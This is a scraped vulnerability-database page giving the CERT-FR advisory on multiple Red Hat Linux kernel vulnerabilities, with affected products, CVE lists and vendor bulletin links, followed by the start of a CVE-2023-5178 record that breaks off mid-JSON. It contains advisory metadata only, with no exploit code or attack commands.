Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CERTFR-2024-AVI-0227
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans le noyau Linux de RedHat. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une élévation de privilèges.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour ARM 64 - Extended Update Support 9.2 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Power, little endian 7 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time pour x86_64 - 4 years of updates 9.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour Power LE - Update Services pour SAP Solutions 9.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - TUS 8.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time - Telecommunications Update Service 8.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - Extended Life Cycle Support (for IBM z Systems) 7 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour ARM 64 - Extended Update Support 9.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time pour NFV 7 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time 7 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour x86_64 - Update Services pour SAP Solutions 9.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour ARM 64 - Extended Update Support 9.2 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour Power LE - Update Services pour SAP Solutions 8.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Power, little endian - Extended Update Support 9.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour IBM z Systems - Extended Update Support 9.2 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour x86_64 - Extended Update Support 9.0 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour IBM z Systems - Extended Update Support 9.2 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server 7 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour Power LE - Update Services pour SAP Solutions 9.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - Extended Life Cycle Support 7 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour x86_64 - Extended Update Support 9.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour IBM z Systems - 4 years of updates 9.2 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux Workstation 7 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour IBM z Systems - Extended Update Support 9.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour x86_64 - Update Services pour SAP Solutions 8.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour IBM z Systems - Extended Update Support 9.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour x86_64 - Extended Update Support 9.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 9.2 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour x86_64 - Extended Update Support 9.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour IBM z Systems 7 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time pour NFV pour x86_64 - 4 years of updates 9.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time pour NFV - Telecommunications Update Service 8.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Power, little endian - Extended Update Support 9.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour ARM 64 - 4 years of updates 9.2 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Scientific Computing 7 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Power, big endian 7 ppc64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux Desktop 7 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time pour NFV pour x86_64 - 4 years of updates 9.2 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour Power, little endian - Extended Update Support 9.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour ARM 64 - 4 years of updates 9.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour x86_64 - Update Services pour SAP Solutions 9.2 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour Power, little endian - Extended Update Support 9.0 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder pour ARM 64 - Extended Update Support 9.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server pour IBM z Systems - 4 years of updates 9.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux pour Real Time pour x86_64 - 4 years of updates 9.2 x86_64 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Red Hat CodeReady Linux Builder pour ARM 64 - Extended Update Support 9.2 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Power, little endian 7 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time pour x86_64 - 4 years of updates 9.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour Power LE - Update Services pour SAP Solutions 9.2 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time - Telecommunications Update Service 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - Extended Life Cycle Support (for IBM z Systems) 7 s390x",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour ARM 64 - Extended Update Support 9.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time pour NFV 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour x86_64 - Update Services pour SAP Solutions 9.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour ARM 64 - Extended Update Support 9.2 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour Power LE - Update Services pour SAP Solutions 8.2 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Power, little endian - Extended Update Support 9.2 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour IBM z Systems - Extended Update Support 9.2 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour x86_64 - Extended Update Support 9.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour IBM z Systems - Extended Update Support 9.2 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour Power LE - Update Services pour SAP Solutions 9.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - Extended Life Cycle Support 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour x86_64 - Extended Update Support 9.2 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour IBM z Systems - 4 years of updates 9.2 s390x",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Workstation 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour IBM z Systems - Extended Update Support 9.0 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour x86_64 - Update Services pour SAP Solutions 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour IBM z Systems - Extended Update Support 9.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour x86_64 - Extended Update Support 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour x86_64 - Extended Update Support 9.0 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour IBM z Systems 7 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time pour NFV pour x86_64 - 4 years of updates 9.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time pour NFV - Telecommunications Update Service 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Power, little endian - Extended Update Support 9.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour ARM 64 - 4 years of updates 9.2 aarch64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Scientific Computing 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Power, big endian 7 ppc64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Desktop 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time pour NFV pour x86_64 - 4 years of updates 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour Power, little endian - Extended Update Support 9.2 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour ARM 64 - 4 years of updates 9.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour x86_64 - Update Services pour SAP Solutions 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour Power, little endian - Extended Update Support 9.0 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder pour ARM 64 - Extended Update Support 9.0 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server pour IBM z Systems - 4 years of updates 9.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux pour Real Time pour x86_64 - 4 years of updates 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-3390",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3390"
},
{
"name": "CVE-2023-5178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5178"
},
{
"name": "CVE-2022-0480",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0480"
},
{
"name": "CVE-2024-0646",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0646"
},
{
"name": "CVE-2023-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40283"
},
{
"name": "CVE-2023-2163",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2163"
},
{
"name": "CVE-2023-6817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6817"
},
{
"name": "CVE-2022-41858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41858"
},
{
"name": "CVE-2023-3611",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3611"
},
{
"name": "CVE-2023-31436",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31436"
},
{
"name": "CVE-2023-4921",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4921"
},
{
"name": "CVE-2022-42896",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42896"
},
{
"name": "CVE-2023-38409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38409"
},
{
"name": "CVE-2022-3545",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3545"
},
{
"name": "CVE-2023-2176",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2176"
},
{
"name": "CVE-2023-4459",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4459"
},
{
"name": "CVE-2023-45871",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45871"
},
{
"name": "CVE-2022-40982",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40982"
},
{
"name": "CVE-2023-3609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3609"
},
{
"name": "CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"name": "CVE-2023-4622",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4622"
},
{
"name": "CVE-2024-26602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26602"
},
{
"name": "CVE-2023-6932",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6932"
},
{
"name": "CVE-2023-35001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35001"
},
{
"name": "CVE-2023-6546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6546"
},
{
"name": "CVE-2023-7192",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7192"
},
{
"name": "CVE-2024-1086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1086"
},
{
"name": "CVE-2023-4623",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4623"
},
{
"name": "CVE-2023-3268",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3268"
},
{
"name": "CVE-2023-5717",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5717"
},
{
"name": "CVE-2023-2166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2166"
},
{
"name": "CVE-2023-1192",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1192"
}
],
"initial_release_date": "2024-03-15T00:00:00",
"last_revision_date": "2024-03-15T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0227",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-03-15T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans \u003cspan\nclass=\"textit\"\u003ele noyau Linux de RedHat\u003c/span\u003e. Certaines d\u0027entre elles\npermettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire\n\u00e0 distance, un d\u00e9ni de service \u00e0 distance et une \u00e9l\u00e9vation de\nprivil\u00e8ges.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de RedHat",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1268 du 12 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1253 du 12 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1269 du 12 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1304 du 13 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1304"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1332 du 14 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1332"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1306 du 13 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1303 du 13 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1303"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1250 du 12 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 RedHat RHSA-2024:1249 du 12 mars 2024",
"url": "https://access.redhat.com/errata/RHSA-2024:1249"
}
]
}
CVE-2023-5178 (GCVE-0-2023-5178)
Vulnerability from cvelistv5
Published
2023-11-01 16:32
Modified
2025-09-26 02:52
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.
References
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.9.1.rt7.311.el8_9 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:52:07.827Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2023:7370",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7370"
},
{
"name": "RHSA-2023:7379",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7379"
},
{
"name": "RHSA-2023:7418",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7418"
},
{
"name": "RHSA-2023:7548",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7548"
},
{
"name": "RHSA-2023:7549",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7549"
},
{
"name": "RHSA-2023:7551",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7551"
},
{
"name": "RHSA-2023:7554",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7554"
},
{
"name": "RHSA-2023:7557",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7557"
},
{
"name": "RHSA-2023:7559",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7559"
},
{
"name": "RHSA-2024:0340",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0340"
},
{
"name": "RHSA-2024:0378",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0378"
},
{
"name": "RHSA-2024:0386",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0386"
},
{
"name": "RHSA-2024:0412",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0412"
},
{
"name": "RHSA-2024:0431",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0431"
},
{
"name": "RHSA-2024:0432",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0432"
},
{
"name": "RHSA-2024:0461",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0461"
},
{
"name": "RHSA-2024:0554",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0554"
},
{
"name": "RHSA-2024:0575",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0575"
},
{
"name": "RHSA-2024:1268",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"name": "RHSA-2024:1269",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"name": "RHSA-2024:1278",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-5178"
},
{
"name": "RHBZ#2241924",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241924"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/linux-nvme/20231002105428.226515-1-sagi@grimberg.me/"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20231208-0004/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.9.1.rt7.311.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.9.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
